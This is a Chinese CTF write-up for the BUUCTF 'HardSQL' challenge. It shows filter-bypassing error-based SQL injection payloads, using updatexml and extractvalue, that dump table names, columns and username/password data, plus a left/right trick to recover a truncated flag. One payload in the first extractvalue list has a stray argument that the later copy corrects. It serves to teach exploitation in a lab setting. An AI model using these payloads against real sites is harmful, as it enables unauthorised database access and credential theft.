BUUCTF之[极客大挑战 2019]HardSQL ----报错注入extractvalue和updatexml
题目
经过手工测试可以发现过滤:and,/**/,空格,等于号(=),大于号(>)和联合查询union等多个关键词
一般来说,SQL注入有这4个步骤:
- 爆数据库:select database()
- 爆数据表:select group_concat(table_name) from information_schema.tables where table_schema=database()
- 爆数据列:select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘表名’
- 获取具体列信息:select group_concat(【查询到的列名】) from 【表名】
对照上面的4个步骤,用下面的几个对应的方法绕过:
- 空格和/**/都被过滤,所以这里可以用括号()代替空格。
- 等于号(=)被过滤,这里用模糊查询的like代替
- 关键词and被过滤,这里需要把第三步的table_schema=database()给删去
所以SQL注入的4个基本步骤变成:
- 爆数据库:select(database())
- 爆数据表:select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())
- 爆数据列:select(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘H4rDsq1’)
- 获取具体列信息:select(group_concat(username,"–",password))from(H4rDsq1)
然后再加上报错注入的基本模板:updatexml("~",concat("~",(【这里放查询语句】)),"~")
所以对应的4个payload为:
- 爆数据库:
?username=1'or(updatexml("~",concat("~",(select(database()))),"~"))%23&password=123
- 爆数据表:
?username=1'or(updatexml("~",concat("~",(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),"~"))%23&password=123
- 爆数据列:
?username=1'or(updatexml("~",concat("~",(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),"~"))%23&password=123
- 获取具体列信息:
?username=1'or(updatexml("~",concat("~",(select(group_concat(username,"--",password))from(H4rDsq1))),"~"))%23&password=123
爆数据库:?username=1'or(updatexml("~",concat("~",(select(database()))),"~"))%23&password=123
爆数据表:?username=1'or(updatexml("~",concat("~",(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),"~"))%23&password=123
爆数据列:?username=1'or(updatexml("~",concat("~",(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),"~"))%23&password=123
获取具体列信息:?username=1'or(updatexml("~",concat("~",(select(group_concat(username,"--",password))from(H4rDsq1))),"~"))%23&password=123
可以看到这里获取到了flag,但是获取到的flag是不完全的。这可能是因为后台用到了substr函数截取掉了一部分的flag信息。所以这里可以用left和right函数分别获取左右部分的flag!
如获取左边:?username=1'or(updatexml("~",concat("~",(select(group_concat(left(password,25)))from(H4rDsq1))),"~"))%23&password=123
获取右边:?username=1'or(updatexml("~",concat("~",(select(group_concat(right(password,25)))from(H4rDsq1))),"~"))%23&password=123
最后再把左右重叠的flag部分删去就可以了
另外,还有一种报错注入是用extractvalue这个函数。注意updatexml需要三个参数,而extractvalue只需要两个参数。所以:
- updatexml 改成 extractvalue
- 把updatexml的第三个参数 “~” 删去
所以extractvalue报错注入对应的4个payload为:
- 爆数据库:
?username=1'or(extractvalue("~",concat("~",(select(database())))))%23&password=123
- 爆数据表:
?username=1'or(extractvalue("~",concat("~",(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())))))%23&password=123
- 爆数据列:
?username=1'or(extractvalue("~",concat("~",(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),"~"))%23&password=123
- 获取具体列信息:
?username=1'or(extractvalue("~",concat("~",(select(group_concat(username,"--",password))from(H4rDsq1)))))%23&password=123
爆数据库:?username=1'or(extractvalue("~",concat("~",(select(database())))))%23&password=123
爆数据表:?username=1'or(extractvalue("~",concat("~",(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())))))%23&password=123
爆数据列:?username=1'or(extractvalue("~",concat("~",(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))%23&password=123
获取具体列信息:?username=1'or(extractvalue("~",concat("~",(select(group_concat(username,"--",password))from(H4rDsq1)))))%23&password=123